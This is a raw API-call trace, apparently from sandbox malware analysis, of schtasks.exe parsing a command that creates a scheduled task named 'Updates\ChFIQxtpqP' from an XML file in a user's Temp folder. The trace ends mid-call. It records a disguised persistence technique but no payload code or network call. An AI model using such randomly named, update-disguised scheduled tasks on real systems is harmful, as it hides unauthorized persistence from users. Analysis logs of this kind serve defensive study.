0x409 [0172.507] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0172.507] lstrlenW (lpString="?") returned 1 [0172.507] GetThreadLocale () returned 0x409 [0172.507] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0172.507] lstrlenW (lpString="create") returned 6 [0172.507] GetThreadLocale () returned 0x409 [0172.507] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0172.507] lstrlenW (lpString="delete") returned 6 [0172.507] GetThreadLocale () returned 0x409 [0172.507] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0172.507] lstrlenW (lpString="query") returned 5 [0172.507] GetThreadLocale () returned 0x409 [0172.507] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0172.507] lstrlenW (lpString="change") returned 6 [0172.507] GetThreadLocale () returned 0x409 [0172.507] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0172.508] lstrlenW (lpString="run") returned 3 [0172.508] GetThreadLocale () returned 0x409 [0172.508] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0172.508] lstrlenW (lpString="end") returned 3 [0172.508] GetThreadLocale () returned 0x409 [0172.508] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0172.508] lstrlenW (lpString="showsid") returned 7 [0172.508] GetThreadLocale () returned 0x409 [0172.508] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0172.508] SetLastError (dwErrCode=0x0) [0172.508] SetLastError (dwErrCode=0x0) [0172.508] lstrlenW (lpString="/Create") returned 7 [0172.508] lstrlenW (lpString="-/") returned 2 [0172.508] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0172.508] lstrlenW (lpString="?") returned 1 [0172.508] lstrlenW (lpString="?") returned 1 [0172.508] GetProcessHeap () returned 0x600000 [0172.508] RtlAllocateHeap (HeapHandle=0x600000, Flags=0xc, Size=0x10) returned 0x614ce0 [0172.508] _memicmp (_Buf1=0x614ce0, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.508] GetProcessHeap () returned 0x600000 [0172.508] RtlAllocateHeap (HeapHandle=0x600000, Flags=0xc, Size=0xa) returned 0x614cf8 [0172.508] lstrlenW (lpString="Create") returned 6 [0172.508] GetProcessHeap () returned 0x600000 [0172.508] RtlAllocateHeap (HeapHandle=0x600000, Flags=0xc, Size=0x10) returned 0x614d10 [0172.508] _memicmp (_Buf1=0x614d10, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.508] GetProcessHeap () returned 0x600000 [0172.508] RtlAllocateHeap (HeapHandle=0x600000, Flags=0xc, Size=0x14) returned 0x615318 [0172.509] _vsnwprintf (in: _Buffer=0x614cf8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x25f540 | out: _Buffer="|?|") returned 3 [0172.509] _vsnwprintf (in: _Buffer=0x615318, _BufferCount=0x9, _Format="|%s|", _ArgList=0x25f540 | out: _Buffer="|Create|") returned 8 [0172.509] lstrlenW (lpString="|?|") returned 3 [0172.509] lstrlenW (lpString="|Create|") returned 8 [0172.509] SetLastError (dwErrCode=0x490) [0172.509] lstrlenW (lpString="create") returned 6 [0172.509] lstrlenW (lpString="create") returned 6 [0172.509] _memicmp (_Buf1=0x614ce0, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.509] GetProcessHeap () returned 0x600000 [0172.509] HeapValidate (hHeap=0x600000, dwFlags=0x0, lpMem=0x614cf8) returned 1 [0172.509] GetProcessHeap () returned 0x600000 [0172.509] RtlReAllocateHeap (Heap=0x600000, Flags=0xc, Ptr=0x614cf8, Size=0x14) returned 0x615338 [0172.509] lstrlenW (lpString="Create") returned 6 [0172.509] _memicmp (_Buf1=0x614d10, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.509] _vsnwprintf (in: _Buffer=0x615338, _BufferCount=0x9, _Format="|%s|", _ArgList=0x25f540 | out: _Buffer="|create|") returned 8 [0172.509] _vsnwprintf (in: _Buffer=0x615318, _BufferCount=0x9, _Format="|%s|", _ArgList=0x25f540 | out: _Buffer="|Create|") returned 8 [0172.509] lstrlenW (lpString="|create|") returned 8 [0172.509] lstrlenW (lpString="|Create|") returned 8 [0172.509] StrStrIW (lpFirst="|create|", lpSrch="|Create|") returned="|create|" [0172.509] SetLastError (dwErrCode=0x0) [0172.509] SetLastError (dwErrCode=0x0) [0172.509] SetLastError (dwErrCode=0x0) [0172.509] lstrlenW (lpString="/TN") returned 3 [0172.509] lstrlenW (lpString="-/") returned 2 [0172.509] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0172.509] lstrlenW (lpString="?") returned 1 [0172.510] lstrlenW (lpString="?") returned 1 [0172.510] _memicmp (_Buf1=0x614ce0, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.510] lstrlenW (lpString="TN") returned 2 [0172.510] _memicmp (_Buf1=0x614d10, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.510] _vsnwprintf (in: _Buffer=0x615338, _BufferCount=0x4, _Format="|%s|", _ArgList=0x25f540 | out: _Buffer="|?|") returned 3 [0172.510] _vsnwprintf (in: _Buffer=0x615318, _BufferCount=0x5, _Format="|%s|", _ArgList=0x25f540 | out: _Buffer="|TN|") returned 4 [0172.510] lstrlenW (lpString="|?|") returned 3 [0172.510] lstrlenW (lpString="|TN|") returned 4 [0172.510] SetLastError (dwErrCode=0x490) [0172.510] lstrlenW (lpString="create") returned 6 [0172.510] lstrlenW (lpString="create") returned 6 [0172.510] _memicmp (_Buf1=0x614ce0, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.510] lstrlenW (lpString="TN") returned 2 [0172.510] _memicmp (_Buf1=0x614d10, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.510] _vsnwprintf (in: _Buffer=0x615338, _BufferCount=0x9, _Format="|%s|", _ArgList=0x25f540 | out: _Buffer="|create|") returned 8 [0172.510] _vsnwprintf (in: _Buffer=0x615318, _BufferCount=0x5, _Format="|%s|", _ArgList=0x25f540 | out: _Buffer="|TN|") returned 4 [0172.510] lstrlenW (lpString="|create|") returned 8 [0172.510] lstrlenW (lpString="|TN|") returned 4 [0172.510] StrStrIW (lpFirst="|create|", lpSrch="|TN|") returned 0x0 [0172.510] SetLastError (dwErrCode=0x490) [0172.510] lstrlenW (lpString="delete") returned 6 [0172.510] lstrlenW (lpString="delete") returned 6 [0172.510] _memicmp (_Buf1=0x614ce0, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.510] lstrlenW (lpString="TN") returned 2 [0172.510] _memicmp (_Buf1=0x614d10, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.511] _vsnwprintf (in: _Buffer=0x615338, _BufferCount=0x9, _Format="|%s|", _ArgList=0x25f540 | out: _Buffer="|delete|") returned 8 [0172.511] _vsnwprintf (in: _Buffer=0x615318, _BufferCount=0x5, _Format="|%s|", _ArgList=0x25f540 | out: _Buffer="|TN|") returned 4 [0172.511] lstrlenW (lpString="|delete|") returned 8 [0172.511] lstrlenW (lpString="|TN|") returned 4 [0172.511] StrStrIW (lpFirst="|delete|", lpSrch="|TN|") returned 0x0 [0172.511] SetLastError (dwErrCode=0x490) [0172.511] lstrlenW (lpString="query") returned 5 [0172.511] lstrlenW (lpString="query") returned 5 [0172.511] _memicmp (_Buf1=0x614ce0, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.511] lstrlenW (lpString="TN") returned 2 [0172.511] _memicmp (_Buf1=0x614d10, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.511] _vsnwprintf (in: _Buffer=0x615338, _BufferCount=0x8, _Format="|%s|", _ArgList=0x25f540 | out: _Buffer="|query|") returned 7 [0172.511] _vsnwprintf (in: _Buffer=0x615318, _BufferCount=0x5, _Format="|%s|", _ArgList=0x25f540 | out: _Buffer="|TN|") returned 4 [0172.511] lstrlenW (lpString="|query|") returned 7 [0172.511] lstrlenW (lpString="|TN|") returned 4 [0172.511] StrStrIW (lpFirst="|query|", lpSrch="|TN|") returned 0x0 [0172.511] SetLastError (dwErrCode=0x490) [0172.511] lstrlenW (lpString="change") returned 6 [0172.511] lstrlenW (lpString="change") returned 6 [0172.511] _memicmp (_Buf1=0x614ce0, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.511] lstrlenW (lpString="TN") returned 2 [0172.511] _memicmp (_Buf1=0x614d10, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.511] _vsnwprintf (in: _Buffer=0x615338, _BufferCount=0x9, _Format="|%s|", _ArgList=0x25f540 | out: _Buffer="|change|") returned 8 [0172.511] _vsnwprintf (in: _Buffer=0x615318, _BufferCount=0x5, _Format="|%s|", _ArgList=0x25f540 | out: _Buffer="|TN|") returned 4 [0172.511] lstrlenW (lpString="|change|") returned 8 [0172.512] lstrlenW (lpString="|TN|") returned 4 [0172.512] StrStrIW (lpFirst="|change|", lpSrch="|TN|") returned 0x0 [0172.512] SetLastError (dwErrCode=0x490) [0172.512] lstrlenW (lpString="run") returned 3 [0172.512] lstrlenW (lpString="run") returned 3 [0172.512] _memicmp (_Buf1=0x614ce0, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.512] lstrlenW (lpString="TN") returned 2 [0172.512] _memicmp (_Buf1=0x614d10, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.512] _vsnwprintf (in: _Buffer=0x615338, _BufferCount=0x6, _Format="|%s|", _ArgList=0x25f540 | out: _Buffer="|run|") returned 5 [0172.512] _vsnwprintf (in: _Buffer=0x615318, _BufferCount=0x5, _Format="|%s|", _ArgList=0x25f540 | out: _Buffer="|TN|") returned 4 [0172.512] lstrlenW (lpString="|run|") returned 5 [0172.512] lstrlenW (lpString="|TN|") returned 4 [0172.512] StrStrIW (lpFirst="|run|", lpSrch="|TN|") returned 0x0 [0172.512] SetLastError (dwErrCode=0x490) [0172.512] lstrlenW (lpString="end") returned 3 [0172.512] lstrlenW (lpString="end") returned 3 [0172.512] _memicmp (_Buf1=0x614ce0, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.512] lstrlenW (lpString="TN") returned 2 [0172.512] _memicmp (_Buf1=0x614d10, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.512] _vsnwprintf (in: _Buffer=0x615338, _BufferCount=0x6, _Format="|%s|", _ArgList=0x25f540 | out: _Buffer="|end|") returned 5 [0172.512] _vsnwprintf (in: _Buffer=0x615318, _BufferCount=0x5, _Format="|%s|", _ArgList=0x25f540 | out: _Buffer="|TN|") returned 4 [0172.512] lstrlenW (lpString="|end|") returned 5 [0172.512] lstrlenW (lpString="|TN|") returned 4 [0172.512] StrStrIW (lpFirst="|end|", lpSrch="|TN|") returned 0x0 [0172.512] SetLastError (dwErrCode=0x490) [0172.513] lstrlenW (lpString="showsid") returned 7 [0172.513] lstrlenW (lpString="showsid") returned 7 [0172.513] _memicmp (_Buf1=0x614ce0, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.513] GetProcessHeap () returned 0x600000 [0172.513] HeapValidate (hHeap=0x600000, dwFlags=0x0, lpMem=0x615338) returned 1 [0172.513] GetProcessHeap () returned 0x600000 [0172.513] RtlReAllocateHeap (Heap=0x600000, Flags=0xc, Ptr=0x615338, Size=0x16) returned 0x615358 [0172.513] lstrlenW (lpString="TN") returned 2 [0172.513] _memicmp (_Buf1=0x614d10, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.513] _vsnwprintf (in: _Buffer=0x615358, _BufferCount=0xa, _Format="|%s|", _ArgList=0x25f540 | out: _Buffer="|showsid|") returned 9 [0172.513] _vsnwprintf (in: _Buffer=0x615318, _BufferCount=0x5, _Format="|%s|", _ArgList=0x25f540 | out: _Buffer="|TN|") returned 4 [0172.513] lstrlenW (lpString="|showsid|") returned 9 [0172.513] lstrlenW (lpString="|TN|") returned 4 [0172.513] StrStrIW (lpFirst="|showsid|", lpSrch="|TN|") returned 0x0 [0172.513] SetLastError (dwErrCode=0x490) [0172.513] SetLastError (dwErrCode=0x490) [0172.513] SetLastError (dwErrCode=0x0) [0172.513] lstrlenW (lpString="/TN") returned 3 [0172.513] StrChrIW (lpStart="/TN", wMatch=0x3a) returned 0x0 [0172.513] SetLastError (dwErrCode=0x490) [0172.513] SetLastError (dwErrCode=0x0) [0172.513] lstrlenW (lpString="/TN") returned 3 [0172.513] GetProcessHeap () returned 0x600000 [0172.513] RtlAllocateHeap (HeapHandle=0x600000, Flags=0xc, Size=0x8) returned 0x616958 [0172.513] GetProcessHeap () returned 0x600000 [0172.513] RtlAllocateHeap (HeapHandle=0x600000, Flags=0xc, Size=0x14) returned 0x615338 [0172.513] SetLastError (dwErrCode=0x0) [0172.514] SetLastError (dwErrCode=0x0) [0172.514] lstrlenW (lpString="Updates\\ChFIQxtpqP") returned 18 [0172.514] lstrlenW (lpString="-/") returned 2 [0172.514] StrChrIW (lpStart="-/", wMatch=0x55) returned 0x0 [0172.514] SetLastError (dwErrCode=0x490) [0172.514] SetLastError (dwErrCode=0x490) [0172.514] SetLastError (dwErrCode=0x0) [0172.514] lstrlenW (lpString="Updates\\ChFIQxtpqP") returned 18 [0172.514] StrChrIW (lpStart="Updates\\ChFIQxtpqP", wMatch=0x3a) returned 0x0 [0172.514] SetLastError (dwErrCode=0x490) [0172.514] SetLastError (dwErrCode=0x0) [0172.514] lstrlenW (lpString="Updates\\ChFIQxtpqP") returned 18 [0172.514] GetProcessHeap () returned 0x600000 [0172.514] RtlAllocateHeap (HeapHandle=0x600000, Flags=0xc, Size=0x26) returned 0x616968 [0172.514] GetProcessHeap () returned 0x600000 [0172.514] RtlAllocateHeap (HeapHandle=0x600000, Flags=0xc, Size=0x14) returned 0x615378 [0172.514] SetLastError (dwErrCode=0x0) [0172.514] SetLastError (dwErrCode=0x0) [0172.514] lstrlenW (lpString="/XML") returned 4 [0172.514] lstrlenW (lpString="-/") returned 2 [0172.514] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0172.514] lstrlenW (lpString="?") returned 1 [0172.514] lstrlenW (lpString="?") returned 1 [0172.514] _memicmp (_Buf1=0x614ce0, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.514] lstrlenW (lpString="XML") returned 3 [0172.514] _memicmp (_Buf1=0x614d10, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.514] _vsnwprintf (in: _Buffer=0x615358, _BufferCount=0x4, _Format="|%s|", _ArgList=0x25f540 | out: _Buffer="|?|") returned 3 [0172.514] _vsnwprintf (in: _Buffer=0x615318, _BufferCount=0x6, _Format="|%s|", _ArgList=0x25f540 | out: _Buffer="|XML|") returned 5 [0172.515] lstrlenW (lpString="|?|") returned 3 [0172.515] lstrlenW (lpString="|XML|") returned 5 [0172.515] SetLastError (dwErrCode=0x490) [0172.515] lstrlenW (lpString="create") returned 6 [0172.515] lstrlenW (lpString="create") returned 6 [0172.515] _memicmp (_Buf1=0x614ce0, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.515] lstrlenW (lpString="XML") returned 3 [0172.515] _memicmp (_Buf1=0x614d10, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.515] _vsnwprintf (in: _Buffer=0x615358, _BufferCount=0x9, _Format="|%s|", _ArgList=0x25f540 | out: _Buffer="|create|") returned 8 [0172.515] _vsnwprintf (in: _Buffer=0x615318, _BufferCount=0x6, _Format="|%s|", _ArgList=0x25f540 | out: _Buffer="|XML|") returned 5 [0172.515] lstrlenW (lpString="|create|") returned 8 [0172.515] lstrlenW (lpString="|XML|") returned 5 [0172.515] StrStrIW (lpFirst="|create|", lpSrch="|XML|") returned 0x0 [0172.515] SetLastError (dwErrCode=0x490) [0172.515] lstrlenW (lpString="delete") returned 6 [0172.515] lstrlenW (lpString="delete") returned 6 [0172.515] _memicmp (_Buf1=0x614ce0, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.515] lstrlenW (lpString="XML") returned 3 [0172.515] _memicmp (_Buf1=0x614d10, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.515] _vsnwprintf (in: _Buffer=0x615358, _BufferCount=0x9, _Format="|%s|", _ArgList=0x25f540 | out: _Buffer="|delete|") returned 8 [0172.515] _vsnwprintf (in: _Buffer=0x615318, _BufferCount=0x6, _Format="|%s|", _ArgList=0x25f540 | out: _Buffer="|XML|") returned 5 [0172.515] lstrlenW (lpString="|delete|") returned 8 [0172.515] lstrlenW (lpString="|XML|") returned 5 [0172.515] StrStrIW (lpFirst="|delete|", lpSrch="|XML|") returned 0x0 [0172.515] SetLastError (dwErrCode=0x490) [0172.515] lstrlenW (lpString="query") returned 5 [0172.515] lstrlenW (lpString="query") returned 5 [0172.516] _memicmp (_Buf1=0x614ce0, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.516] lstrlenW (lpString="XML") returned 3 [0172.516] _memicmp (_Buf1=0x614d10, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.516] _vsnwprintf (in: _Buffer=0x615358, _BufferCount=0x8, _Format="|%s|", _ArgList=0x25f540 | out: _Buffer="|query|") returned 7 [0172.516] _vsnwprintf (in: _Buffer=0x615318, _BufferCount=0x6, _Format="|%s|", _ArgList=0x25f540 | out: _Buffer="|XML|") returned 5 [0172.516] lstrlenW (lpString="|query|") returned 7 [0172.516] lstrlenW (lpString="|XML|") returned 5 [0172.516] StrStrIW (lpFirst="|query|", lpSrch="|XML|") returned 0x0 [0172.516] SetLastError (dwErrCode=0x490) [0172.516] lstrlenW (lpString="change") returned 6 [0172.516] lstrlenW (lpString="change") returned 6 [0172.516] _memicmp (_Buf1=0x614ce0, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.516] lstrlenW (lpString="XML") returned 3 [0172.516] _memicmp (_Buf1=0x614d10, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.516] _vsnwprintf (in: _Buffer=0x615358, _BufferCount=0x9, _Format="|%s|", _ArgList=0x25f540 | out: _Buffer="|change|") returned 8 [0172.516] _vsnwprintf (in: _Buffer=0x615318, _BufferCount=0x6, _Format="|%s|", _ArgList=0x25f540 | out: _Buffer="|XML|") returned 5 [0172.516] lstrlenW (lpString="|change|") returned 8 [0172.516] lstrlenW (lpString="|XML|") returned 5 [0172.516] StrStrIW (lpFirst="|change|", lpSrch="|XML|") returned 0x0 [0172.516] SetLastError (dwErrCode=0x490) [0172.516] lstrlenW (lpString="run") returned 3 [0172.516] lstrlenW (lpString="run") returned 3 [0172.516] _memicmp (_Buf1=0x614ce0, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.517] lstrlenW (lpString="XML") returned 3 [0172.517] _memicmp (_Buf1=0x614d10, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.517] _vsnwprintf (in: _Buffer=0x615358, _BufferCount=0x6, _Format="|%s|", _ArgList=0x25f540 | out: _Buffer="|run|") returned 5 [0172.517] _vsnwprintf (in: _Buffer=0x615318, _BufferCount=0x6, _Format="|%s|", _ArgList=0x25f540 | out: _Buffer="|XML|") returned 5 [0172.517] lstrlenW (lpString="|run|") returned 5 [0172.517] lstrlenW (lpString="|XML|") returned 5 [0172.517] StrStrIW (lpFirst="|run|", lpSrch="|XML|") returned 0x0 [0172.517] SetLastError (dwErrCode=0x490) [0172.517] lstrlenW (lpString="end") returned 3 [0172.517] lstrlenW (lpString="end") returned 3 [0172.517] _memicmp (_Buf1=0x614ce0, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.517] lstrlenW (lpString="XML") returned 3 [0172.517] _memicmp (_Buf1=0x614d10, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.517] _vsnwprintf (in: _Buffer=0x615358, _BufferCount=0x6, _Format="|%s|", _ArgList=0x25f540 | out: _Buffer="|end|") returned 5 [0172.517] _vsnwprintf (in: _Buffer=0x615318, _BufferCount=0x6, _Format="|%s|", _ArgList=0x25f540 | out: _Buffer="|XML|") returned 5 [0172.517] lstrlenW (lpString="|end|") returned 5 [0172.517] lstrlenW (lpString="|XML|") returned 5 [0172.517] StrStrIW (lpFirst="|end|", lpSrch="|XML|") returned 0x0 [0172.517] SetLastError (dwErrCode=0x490) [0172.517] lstrlenW (lpString="showsid") returned 7 [0172.517] lstrlenW (lpString="showsid") returned 7 [0172.517] _memicmp (_Buf1=0x614ce0, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.517] lstrlenW (lpString="XML") returned 3 [0172.517] _memicmp (_Buf1=0x614d10, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.518] _vsnwprintf (in: _Buffer=0x615358, _BufferCount=0xa, _Format="|%s|", _ArgList=0x25f540 | out: _Buffer="|showsid|") returned 9 [0172.518] _vsnwprintf (in: _Buffer=0x615318, _BufferCount=0x6, _Format="|%s|", _ArgList=0x25f540 | out: _Buffer="|XML|") returned 5 [0172.518] lstrlenW (lpString="|showsid|") returned 9 [0172.518] lstrlenW (lpString="|XML|") returned 5 [0172.518] StrStrIW (lpFirst="|showsid|", lpSrch="|XML|") returned 0x0 [0172.518] SetLastError (dwErrCode=0x490) [0172.518] SetLastError (dwErrCode=0x490) [0172.518] SetLastError (dwErrCode=0x0) [0172.518] lstrlenW (lpString="/XML") returned 4 [0172.518] StrChrIW (lpStart="/XML", wMatch=0x3a) returned 0x0 [0172.518] SetLastError (dwErrCode=0x490) [0172.518] SetLastError (dwErrCode=0x0) [0172.518] lstrlenW (lpString="/XML") returned 4 [0172.518] GetProcessHeap () returned 0x600000 [0172.518] RtlAllocateHeap (HeapHandle=0x600000, Flags=0xc, Size=0xa) returned 0x614cf8 [0172.518] GetProcessHeap () returned 0x600000 [0172.518] RtlAllocateHeap (HeapHandle=0x600000, Flags=0xc, Size=0x14) returned 0x615398 [0172.518] SetLastError (dwErrCode=0x0) [0172.518] SetLastError (dwErrCode=0x0) [0172.518] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\tmpF047.tmp") returned 60 [0172.518] lstrlenW (lpString="-/") returned 2 [0172.518] StrChrIW (lpStart="-/", wMatch=0x43) returned 0x0 [0172.518] SetLastError (dwErrCode=0x490) [0172.518] SetLastError (dwErrCode=0x490) [0172.518] SetLastError (dwErrCode=0x0) [0172.518] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\tmpF047.tmp") returned 60 [0172.518] StrChrIW (lpStart="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\tmpF047.tmp", wMatch=0x3a) returned=":\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\tmpF047.tmp" [0172.518] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\tmpF047.tmp") returned 60 [0172.518] GetProcessHeap () returned 0x600000 [0172.518] RtlAllocateHeap (HeapHandle=0x600000, Flags=0xc, Size=0x10) returned 0x614d28 [0172.518] _memicmp (_Buf1=0x614d28, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.518] GetProcessHeap () returned 0x600000 [0172.518] RtlAllocateHeap (HeapHandle=0x600000, Flags=0xc, Size=0xc) returned 0x614d40 [0172.519] GetProcessHeap () returned 0x600000 [0172.519] RtlAllocateHeap (HeapHandle=0x600000, Flags=0xc, Size=0x10) returned 0x614d58 [0172.519] _memicmp (_Buf1=0x614d58, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0172.519] GetProcessHeap () returned 0x600000 [0172.519] RtlAllocateHeap (HeapHandle=0x600000, Flags=0xc, Size=0x7e) returned 0x616998 [0172.519] SetLastError (dwErrCode=0x7a) [0172.519] SetLastError (dwErrCode=0x0) [0172.519] SetLastError (dwErrCode=0x0) [0172.519] lstrlenW (lpString="C") returned 1 [0172.519] SetLastError (dwErrCode=0x490) [0172.519] SetLastError (dwErrCode=0x0) [0172.519] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\tmpF047.tmp") returned 60 [0172.519] GetProcessHeap () returned 0x600000 [0172.519] RtlAllocateHeap (HeapHandle=0x600000, Flags=0xc, Size=0x7a) returned 0x616a20 [0172.519] GetProcessHeap () returned 0x600000 [0172.519] RtlAllocateHeap (HeapHandle=0x600000, Flags=0xc, Size=0x14) returned 0x6153b8 [0172.519] SetLastError (dwErrCode=0x0) [0172.519] GetProcessHeap () returned 0x600000 [0172.519] GetProcessHeap () returned 0x600000 [0172.519] HeapValidate (hHeap=0x600000, dwFlags=0x0, lpMem=0x616958) returned 1 [0172.519] GetProcessHeap () returned 0x600000 [0172.519] RtlSizeHeap (HeapHandle=0x600000, Flags=0x0, MemoryPointer=0x616958) returned 0x8 [0172.519] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616958 | out: hHeap=0x600000) returned 1 [0172.519] GetProcessHeap () returned 0x600000 [0172.519] GetProcessHeap () returned 0x600000 [0172.519] HeapValidate (hHeap=0x600000, dwFlags=0x0, lpMem=0x615338) returned 1 [0172.519] GetProcessHeap () returned 0x600000 [0172.519] RtlSizeHeap (HeapHandle=0x600000, Flags=0x0, MemoryPointer=0x615338) returned 0x14 [0172.519] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x615338 | out: hHeap=0x600000) returned 1 [0172.519] GetProcessHeap () returned 0x600000 [0172.519] GetProcessHeap () returned 0x600000 [0172.519] HeapValidate (hHeap=0x600000, dwFlags=0x0, lpMem=0x616968) returned 1 [0172.519] GetProcessHeap () returned 0x600000 [0172.520] RtlSizeHeap (HeapHandle=0x600000, Flags=0x0, MemoryPointer=0x616968) returned 0x26 [0172.520] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616968 | out: hHeap=0x600000) returned 1 [0172.520] GetProcessHeap () returned 0x600000 [0172.520] GetProcessHeap () returned 0x600000 [0172.520] HeapValidate (hHeap=0x600000, dwFlags=0x0, lpMem=0x615378) returned 1 [0172.520] GetProcessHeap () returned 0x600000 [0172.520] RtlSizeHeap (HeapHandle=0x600000, Flags=0x0, MemoryPointer=0x615378) returned 0x14 [0172.520] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x615378 | out: hHeap=0x600000) returned 1 [0172.520] GetProcessHeap () returned 0x600000 [0172.520] GetProcessHeap () returned 0x600000 [0172.520] HeapValidate (hHeap=0x600000, dwFlags=0x0, lpMem=0x614cf8) returned 1 [0172.520] GetProcessHeap () returned 0x600000 [0172.520] RtlSizeHeap (HeapHandle=0x600000, Flags=0x0, MemoryPointer=0x614cf8) returned 0xa [0172.520] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x614cf8 | out: hHeap=0x600000) returned 1 [0172.520] GetProcessHeap () returned 0x600000 [0172.520] GetProcessHeap () returned 0x600000 [0172.520] HeapValidate (hHeap=0x600000, dwFlags=0x0, lpMem=0x615398) returned 1 [0172.520] GetProcessHeap () returned 0x600000 [0172.520] RtlSizeHeap (HeapHandle=0x600000, Flags=0x0, MemoryPointer=0x615398) returned 0x14 [0172.520] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x615398 | out: hHeap=0x600000) returned 1 [0172.520] GetProcessHeap () returned 0x600000 [0172.520] GetProcessHeap () returned 0x600000 [0172.520] HeapValidate (hHeap=0x600000, dwFlags=0x0, lpMem=0x616a20) returned 1 [0172.520] GetProcessHeap () returned 0x600000 [0172.520] RtlSizeHeap (HeapHandle=0x600000, Flags=0x0, MemoryPointer=0x616a20) returned 0x7a [0172.520] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616a20 | out: hHeap=0x600000) returned 1 [0172.520] GetProcessHeap () returned 0x600000 [0172.520] GetProcessHeap () returned 0x600000 [0172.520] HeapValidate (hHeap=0x600000, dwFlags=0x0, lpMem=0x6153b8) returned 1 [0172.520] GetProcessHeap () returned 0x600000 [0172.520] RtlSizeHeap (HeapHandle=0x600000, Flags=0x0, MemoryPointer=0x6153b8) returned 0x14 [0172.520] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6153b8 | out: hHeap=0x600000) returned 1 [0172.521] GetProcessHeap () returned 0x600000 [0172.521] GetProcessHeap () returned 0x600000 [0172.521] HeapValidate (hHeap=0x600000, dwFlags=0x0, lpMem=0x614bd8) returned 1 [0172.521] GetProcessHeap () returned 0x600000 [0172.521] RtlSizeHeap (HeapHandle=0x600000, Flags=0x0, MemoryPointer=0x614bd8) returned 0x10 [0172.521] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x614bd8 | out: hHeap=0x600000) returned 1 [0172.521] SetLastError (dwErrCode=0x0) [0172.521] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18 [0172.521] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b [0172.521] VerSetConditionMask (ConditionMask=0x1b, TypeMask=0x80000000, Condition=0x20) returned 